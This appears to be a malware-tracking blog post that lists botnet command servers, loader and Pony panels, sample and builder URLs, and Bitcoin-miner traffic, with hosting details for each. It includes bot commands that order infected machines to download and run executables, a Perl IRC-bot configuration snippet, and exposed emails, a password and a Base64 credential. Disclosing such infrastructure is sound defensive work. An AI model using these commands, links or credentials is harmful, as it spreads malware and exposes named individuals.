Another botnet found by aLiSs Server: 94.242.198.64:5050 channel: #work Now talking in #workTopic On: [ #work ] [ , ]Topic By: [ x ] hosting infos: http://whois.domaintools.com/94.242.198.64
46.182.107.35(irc botnet hosted in Netherlands Amsterdam Rens Ariens Trading As Your Internet Service Provider)
Server: 46.182.107.35:4042 channel: #pirelli Now talking in #pirelli Topic On: [ #pirelli ] [ !down /99/106/112/81/55/59/40/125/111/122/35/110/105/106/100/107/119/122/121/59/106/120/102/9/71/113/109/127/105/99/54/56/52/50/49/22/48/55/59/15/44/52/51/40/99/101/ 12] Topic By: [ x ] credits to aLiSs for finding this botnet hosting infos: http://whois.domaintools.com/46.182.107.35
150mb samples
This is another package with diferent malware samples have fun analysing them U can have samples here
199.127.102.218(Umbra Loader hosted in United States Miami Avesta Networks Llc)
Panel here: hxxp://199.127.102.218/handy/beta/Panel/Panel/ stub here: hxxp://199.127.102.218/handy/beta/Bot/stub/ Builder: hxxp://199.127.102.218/handy/UMBRA_LOADER_1.2.0.RAR usb spread plugin: hxxp://199.127.102.218/handy/beta/Bot/Plugins/usbspreader.umbplg hosting infos: http://whois.domaintools.com/199.127.102.218
irc.edsel.us.to(PHP bots hosted in Canada Montreal Software AS32613 IWEB-AS – iWeb Technologies Inc)
my $fakeproc = “sh -c (ps -aux)2>&1”;my $ircserver = “irc.edsel.us.to”;my $ircport = “7221”;my $nickname = “i-escorts”;my $ident = “bogo”;my $channel = “#jurig”;my $admin = “SmitfraudFix”;my $fullname = “naon”; Full source here hosting infos: http://whois.domaintools.com/184.107.213.58
securityspecialiastinc.in(Pony hosted in Japan Tokyo Linode Llc)
Resolved : [securityspecialiastinc.in] To [106.187.88.52] Gate: securityspecialiastinc.in/p/gate.php Admin:securityspecialiastinc.in/p/admin.php sample: hxxp://106.187.88.52/p/p.exe Online Crypter: hxxp://securityspecialiastinc.in/crypt.php hosting infos: http://whois.domaintools.com/106.187.88.52
ilikeithard.tk(Pony hosted in United States Kansas City Datashack Lc)
Resolved : [ilikeithard.tk] To [63.141.253.125] Panel: hxxp://ilikeithard.tk/Panel/admin.php Sample: directxex.com/uploads/1632963588.Pony.exe found by justaguy hosting infos: http://whois.domaintools.com/63.141.253.125
t7v4d.com(irc botnet hosted in United States Phoenix Secured Servers Llc)
Thanks to this guy for the sample Resolved : [t7v4d.com] To [108.170.24.42] Server: t7v4d.com:4040 Now talking in ##tntTopic is ‘!np hxxp://3rbcool.net/g1.exe DF37A37D9E33FB9904235855863AA5D5 -r’ hosting infos: http://whois.domaintools.com/108.170.24.42
privatesmartscreen.nl(Bitcoin Miner hosted in Netherlands Amsterdam Denkers-ict B.v.)
DNS Queries: privatesmartscreen.nl DNS_TYPE_A 159.253.0.151 HTTP Conversations: 159.253.0.151:80 – [privatesmartscreen.nl] Request: GET /Bitcoin/host.txt 149.210.128.55:80 – [149.210.128.55] Request: GET /bitconi/winlogon32.exe Request: GET /bitconi/winlogon64.exe Request: GET /bitconi/usft_ext.dll Request: GET /bitconi/miner.dll Request: GET /bitconi/coinutil.dll Request: GET /ptx.exe Request: GET /bitconi/btc.exe Request: GET /bitconi/phatk.exe Dutch hecker here: winlogon32.exe” -o hxxp://pool.50btc.com:8332/ -u jeroengroenveld@live.nl_Apex -p omega321 Samples:Read more...
pool.50btc.com(Bitcoin Miner botnet hosted in Germany Gunzenhausen Magdevelopers)
Resolved : [pool.50btc.com] To [144.76.52.43] HTTP Requests: hxxp://pool.50btc.com:8332/ DATA: POST / HTTP/1.1Authorization: Basic Y2xhdWRpYWdyem4xQGdtYWlsLmNvbV9jbGF1Og==Content-Length: 128X-Mining-Extensions: hostlist longpoll midstate noncerange rollntime switchtoUser-Agent: Ufasoft coin-miner/0.39 (Windows NT XP 5.1.2600 Service Pack 3) Host: pool.50btc.com:8332Cache-Control: no-cache {“method”: “getblocktemplate”, “params”: [{“capabilities”: [“coinbasetxn”, “workid”, “coinbase/append”, “longpollid”]}], “id”:0} Here the hecker: lsass.exe -gno -t1 -o hxxp://claudiagrzn1%40gmail.com_clau@pool.50btc.com:8332 Sample:hxxp://158.255.2.104/cucaz.exe hosting infos: http://whois.domaintools.com/144.76.52.43